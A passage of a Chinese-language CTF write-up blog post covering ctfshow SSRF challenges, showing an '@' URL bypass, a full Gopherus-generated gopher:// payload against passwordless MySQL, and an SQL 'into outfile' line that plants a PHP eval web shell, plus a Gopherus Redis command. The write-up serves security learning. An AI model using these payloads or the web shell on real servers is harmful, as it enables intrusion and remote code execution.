<p>URL&#x4E2D;&#x7684;#&#x7B26;&#x53F7;&#x540E;&#x9762;&#x7684;&#x53C2;&#x6570;&#x662F;&#x79F0;&#x4E3A;&#x201C;&#x7247;&#x6BB5;&#x6807;&#x8BC6;&#x7B26;&#x201D;&#x6216;&#x201C;&#x951A;&#x70B9;&#xFF08;Anchor&#xFF09;&#x201D;&#xFF0C;&#x5B83;&#x6307;&#x5411;&#x5728;&#x5F53;&#x524D;&#x6587;&#x6863;&#x4E2D;&#x7684;&#x4E00;&#x4E2A;&#x7279;&#x5B9A;&#x4F4D;&#x7F6E;&#x6216;&#x6807;&#x8BB0;&#x3002;&#x5728;&#x7F51;&#x9875;&#x4E2D;&#xFF0C;&#x901A;&#x5E38;&#x4F7F;&#x7528;&#x951A;&#x70B9;&#x6765;&#x6307;&#x5411;&#x6587;&#x6863;&#x4E2D;&#x7684;&#x67D0;&#x4E2A;&#x7279;&#x5B9A;&#x90E8;&#x5206;&#xFF0C;&#x6BD4;&#x5982;&#x4E00;&#x4E2A;&#x6807;&#x9898;&#x6216;&#x4E00;&#x4E2A;&#x6BB5;&#x843D;&#xFF0C;&#x4EE5;&#x4FBF;&#x7528;&#x6237;&#x53EF;&#x4EE5;&#x76F4;&#x63A5;&#x8DF3;&#x8F6C;&#x5230;&#x8BE5;&#x90E8;&#x5206;&#x3002;</p>
</blockquote>
<blockquote>
<p>&#x5728;URL&#x4E2D;&#xFF0C;@&#x7B26;&#x53F7;&#x540E;&#x9762;&#x7684;&#x53C2;&#x6570;&#x901A;&#x5E38;&#x7528;&#x4E8E;&#x6307;&#x5B9A;&#x7528;&#x6237;&#x540D;&#x548C;&#x5BC6;&#x7801;&#xFF0C;&#x7528;&#x4E8E;&#x8EAB;&#x4EFD;&#x9A8C;&#x8BC1;(&#x5F88;&#x53E4;&#x65E9;&#x7684;&#x505A;&#x6CD5;&#xFF0C;&#x73B0;&#x5728;&#x7684;&#x767B;&#x5F55;&#x4E00;&#x822C;&#x662F;oauth&#x7B49;&#x7B49;&#x4E86;)</p>
</blockquote>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">//POST</span><br><span class="line">url=http://ctf.@127.0.0.1/flag.php?show</span><br><span class="line"></span><br></pre></td></tr></table></div></figure>


        <h3 id="web359">
          <a href="#web359" class="heading-link"><i class="fas fa-link"></i></a><a href="#web359" class="headerlink" title="web359"></a>web359</h3>
      <p>&#x8003;&#x70B9;&#xFF1A;gopher&#x6253;&#x65E0;&#x5BC6;&#x7801;&#x7684;mysql</p>
<p>&#x9996;&#x5148;&#x968F;&#x4FBF;&#x6CE8;&#x518C;&#x4E00;&#x4E2A;&#x8D26;&#x53F7;&#xFF0C;&#x7136;&#x540E;&#x67E5;&#x770B;&#x6E90;&#x4EE3;&#x7801;&#xFF0C;&#x53D1;&#x73B0;&#x4E86;check.php&#x8FD9;&#x4E2A;&#x5730;&#x65B9;&#x6709;&#x95EE;&#x9898;&#xFF0C;returl</p>
<p><img src="/2023/03/26/SSRF-review/SSRF-review.assets/WEBRESOURCEdfe16bb6084611882bcd56fa535f9098.png"></p>
<p>&#x7136;&#x540E;&#x4F7F;&#x7528;gopherus&#x8FD9;&#x4E2A;&#x8F6F;&#x4EF6;&#x8FDB;&#x884C;&#x64CD;&#x4F5C;</p>
<p>&#x8981;&#x6C42;&#x8F93;&#x5165;&#x6570;&#x636E;&#x5E93;&#x7684;&#x4FE1;&#x606F;&#xFF0C;&#x7167;&#x7740;wp&#x5199;&#x7684;&#x662F;root</p>
<p><img src="/2023/03/26/SSRF-review/SSRF-review.assets/WEBRESOURCEf5af9d3a3e4eeb97f065511937868d81.png"></p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">select &apos;&lt;?php eval($_POST[ra]);?&gt;&apos; into outfile &apos;/var/ww/html/ra.php&apos;;</span><br><span class="line"></span><br></pre></td></tr></table></div></figure>

<p>(&#x8BB0;&#x5F97;sql&#x8BED;&#x53E5;&#x52A0;&#x5206;&#x53F7;)&#x7136;&#x540E;&#x751F;&#x6210;&#x7684;&#x662F;&#xFF1A;</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%48%00%00%00%03%73%65%6c%65%63%74%20%27%3c%3f%70%68%70%20%65%76%61%6c%28%24%5f%50%4f%53%54%5b%72%61%5d%29%3b%3f%3e%27%20%69%6e%74%6f%20%6f%75%74%66%69%6c%65%20%27%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%72%61%2e%70%68%70%27%3b%01%00%00%00%01</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></div></figure>

<p>&#x7136;&#x540E;&#x4F7F;&#x7528;url&#x534A;&#x7F16;&#x7801;&#xFF08;gopher://127.0.0.1:3306/_&#x540E;&#x9762;&#x7684;&#x90FD;&#x8981;&#x7F16;&#x7801;&#xFF09;&#xFF1A;</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">gopher://127.0.0.1:3306/_%25a3%2500%2500%2501%2585%25a6%25ff%2501%2500%2500%2500%2501%2521%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2572%256f%256f%2574%2500%2500%256d%2579%2573%2571%256c%255f%256e%2561%2574%2569%2576%2565%255f%2570%2561%2573%2573%2577%256f%2572%2564%2500%2566%2503%255f%256f%2573%2505%254c%2569%256e%2575%2578%250c%255f%2563%256c%2569%2565%256e%2574%255f%256e%2561%256d%2565%2508%256c%2569%2562%256d%2579%2573%2571%256c%2504%255f%2570%2569%2564%2505%2532%2537%2532%2535%2535%250f%255f%2563%256c%2569%2565%256e%2574%255f%2576%2565%2572%2573%2569%256f%256e%2506%2535%252e%2537%252e%2532%2532%2509%255f%2570%256c%2561%2574%2566%256f%2572%256d%2506%2578%2538%2536%255f%2536%2534%250c%2570%2572%256f%2567%2572%2561%256d%255f%256e%2561%256d%2565%2505%256d%2579%2573%2571%256c%2548%2500%2500%2500%2503%2573%2565%256c%2565%2563%2574%2520%2527%253c%253f%2570%2568%2570%2520%2565%2576%2561%256c%2528%2524%255f%2550%254f%2553%2554%255b%2572%2561%255d%2529%253b%253f%253e%2527%2520%2569%256e%2574%256f%2520%256f%2575%2574%2566%2569%256c%2565%2520%2527%252f%2576%2561%2572%252f%2577%2577%2577%252f%2568%2574%256d%256c%252f%2572%2561%252e%2570%2568%2570%2527%253b%2501%2500%2500%2500%2501</span><br><span class="line"></span><br></pre></td></tr></table></div></figure>

<p>&#x7136;&#x540E;&#x6210;&#x529F;&#x5199;&#x5165;&#x4E00;&#x53E5;&#x8BDD;&#x6728;&#x9A6C;&#x5230;&#x81EA;&#x5B9A;&#x4E49;&#x7684;&#x6587;&#x4EF6;&#x5F53;&#x4E2D;&#x53BB;&#x4E86;</p>
<p>&#x4E8E;&#x662F;&#x5C31;&#x53EF;&#x4EE5;&#x8BFB;&#x53D6;flag&#x4E86;</p>

        <h3 id="web360">
          <a href="#web360" class="heading-link"><i class="fas fa-link"></i></a><a href="#web360" class="headerlink" title="web360"></a>web360</h3>
      <p>gopher&#x6253;redis,&#x636E;&#x8BF4;&#x4F7F;&#x7528;gopherus&#x4E5F;&#x53EF;&#x4EE5;&#x7528;&#xFF0C;&#x6700;&#x597D;&#x8FD8;&#x662F;&#x719F;&#x6089;&#x4E00;&#x4E0B;&#x624B;&#x5DE5;&#x6D4B;&#x8BD5;</p>
<p>&#x5DE5;&#x5177;&#xFF1A;</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python gopherus --exploit redis</span><br></pre></td></tr></table></div></figure>

</div><footer class="post-footer"><div class="post-ending ending"><div class="ending__text">------ END ------</div></div><div class="post-copyright copyright"><div class="copyright-author"><span class="copyright-author__name">Author: </span><span class="copyright-author__value"><a href="http://example.com">Kirsten Carton</a></span></div><div class="copyright-link"><span class="copyright-link__name">Link: </span><span class="copyright-link__value"><a href="http://example.com/2023/03/26/SSRF-review/">http://example.com/2023/03/26/SSRF-review/</a></span></div><div class="copyright-notice"><span class="copyright-notice__name">Copyright: </span><span class="copyright-notice__value">All articles in this blog are licensed under <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.en" rel="external nofollow" target="_blank">BY-NC-SA</a> unless stating additionally</span></div></div><div class="post-tags"><span class="post-tags-item"><span class="post-tags-item__icon"><i class="fas fa-tag"></i></span><a class="post-tags-item__link" href="http://example.com/tags/ctfshow/">ctfshow</a></span><span class="post-tags-item"><span class="post-tags-item__icon"><i class="fas fa-tag"></i></span><a class="post-tags-item__link" href="http://example.com/tags/ssrf/">ssrf</a></span></div><nav class="post-paginator paginator"><div class="paginator-prev"><a class="paginator-prev__link" href="/2023/03/27/JWT-JWT/"><span class="paginator-prev__icon"><i class="fas fa-angle-left"></i></span><span class="paginator-prev__text">JWT-JWT</span></a></div><div class="paginator-next"><a class="paginator-next__link" href="/2022/12/11/Back-to-Blog/"><span class="paginator-prev__text">Back to Blog</span><span class="paginator-next__icon"><i class="fas fa-angle-right"></i></span></a></div></nav></footer></div></div></div><div class="sidebar-wrap" id="sidebar-wrap"><aside class="sidebar" id="sidebar"><div class="sidebar-nav"><span class="sidebar-nav-toc current">Catalog</span><span class="sidebar-nav-ov">Overview</span></div><section class="sidebar-toc"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E9%A2%98%E7%9B%AE%E5%89%8D%E7%BD%AE%E7%9F%A5%E8%AF%86"><span class="toc-number">1.</span> <span class="toc-text">
          题目前置知识</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#web351"><span class="toc-number">1.0.1.</span> <span class="toc-text">
          web351</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web352"><span class="toc-number">1.0.2.</span> <span class="toc-text">
          web352</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web353"><span class="toc-number">1.0.3.</span> <span class="toc-text">
          web353</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web354"><span class="toc-number">1.0.4.</span> <span class="toc-text">
          web354</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web355"><span class="toc-number">1.0.5.</span> <span class="toc-text">
          web355</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web356"><span class="toc-number">1.0.6.</span> <span class="toc-text">
          web356</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web357"><span class="toc-number">1.0.7.</span> <span class="toc-text">
          web357</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web358"><span class="toc-number">1.0.8.</span> <span class="toc-text">
          web358</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web359"><span class="toc-number">1.0.9.</span> <span class="toc-text">
          web359</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web360"><span class="toc-number">1.0.10.</span> <span class="toc-text">
          web360</span></a></li></ol></li></ol></li></ol></section><!-- ov = overview--><section class="sidebar-ov hide"><div class="sidebar-ov-author"><div class="sidebar-ov-author__avatar"><img class="sidebar-ov-author__avatar_img" src="images/imageone/avator one.jpg" alt="avatar"></div><p class="sidebar-ov-author__text">May you be faithful to yourself,live seriously and freely.</p></div><div class="sidebar-ov-social"><a class="sidebar-ov-social-item" href="https://github.com/KirstenCarton" target="_blank" rel="noopener" data-popover="Github" data-popover-pos="up"><span class="sidebar-ov-social-item__icon"><i class="fab fa-github"></i></span></a><a class="sidebar-ov-social-item" href="https://plus.google.com/" target="_blank" rel="noopener" data-popover="Google" data-popover-pos="up"><span class="sidebar-ov-social-item__icon"><i class="fab fa-google"></i></span></a><a class="sidebar-ov-social-item" href="https://twitter.com/" target="_blank" rel="noopener" data-popover="Twitter" data-popover-pos="up"><span class="sidebar-ov-social-item__icon"><i class="fab fa-twitter"></i></span></a><a class="sidebar-ov-social-item" href="https://youtube.com/" target="_blank" rel="noopener" data-popover="Youtube" data-popover-pos="up"><span class="sidebar-ov-social-item__icon"><i class="fab fa-youtube"></i></span></a></div><div class="sidebar-ov-state"><a class="sidebar-ov-state-item sidebar-ov-state-item--posts" href="/archives/"><div class="sidebar-ov-state-item__count">36</div><div class="sidebar-ov-state-item__name">Archives</div></a><a class="sidebar-ov-state-item sidebar-ov-state-item--categories" href="/categories/"><div class="sidebar-ov-state-item__count">3</div><div class="sidebar-ov-state-item__name">Categories</div></a><a class="sidebar-ov-state-item sidebar-ov-state-item--tags" href="/tags/"><div class="sidebar-ov-state-item__count">37</div><div class="sidebar-ov-state-item__name">Tags</div></a></div><div class="sidebar-ov-cc"><a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.en" target="_blank" rel="noopener" data-popover="Creative Commons" data-popover-pos="up"><img src="/images/cc-by-nc-sa.svg"></a></div></section><div class="sidebar-reading"><div class="sidebar-reading-info"><span class="sidebar-reading-info__text">You have read </span><span class="sidebar-reading-info__num">0</span><span class="sidebar-reading-info__perc">%</span></div><div class="sidebar-reading-line"></div></div></aside></div><div class="clearfix"></div></div></main><footer class="footer" id="footer"><div class="footer-inner"><div><span>Copyright © 2023</span><span class="footer__icon"><i class="fas fa-heart"></i></span><span>Kirsten Carton</span></div><div><span>Powered by <a href="http://hexo.io/" title="Hexo" target="_blank" rel="noopener">Hexo</a></span><span> v6.0.0</span><span class="footer__devider">|</span><span>Theme - <a href="https://github.com/liuyib/hexo-theme-stun/" title="Stun" target="_blank" rel="noopener">Stun</a></span><span> v2.6.2</span></div></div></footer><div class="loading-bar" id="loading-bar"><div class="loading-bar__progress"></div></div><div class="back2top" id="back2top"><span class="back2top__icon"><i class="fas fa-rocket"></i></span></div></div><script src="https://cdn.jsdelivr.net/npm/jquery@v3.4.1/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@1.5.2/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@1.5.2/velocity.ui.min.js"></script><script src="/js/utils.js?v=2.6.2"></script><script src="/js/stun-boot.js?v=2.6.2"></script><script src="/js/scroll.js?v=2.6.2"></script><script src="/js/header.js?v=2.6.2"></script><script src="/js/sidebar.js?v=2.6.2"></script></body></html>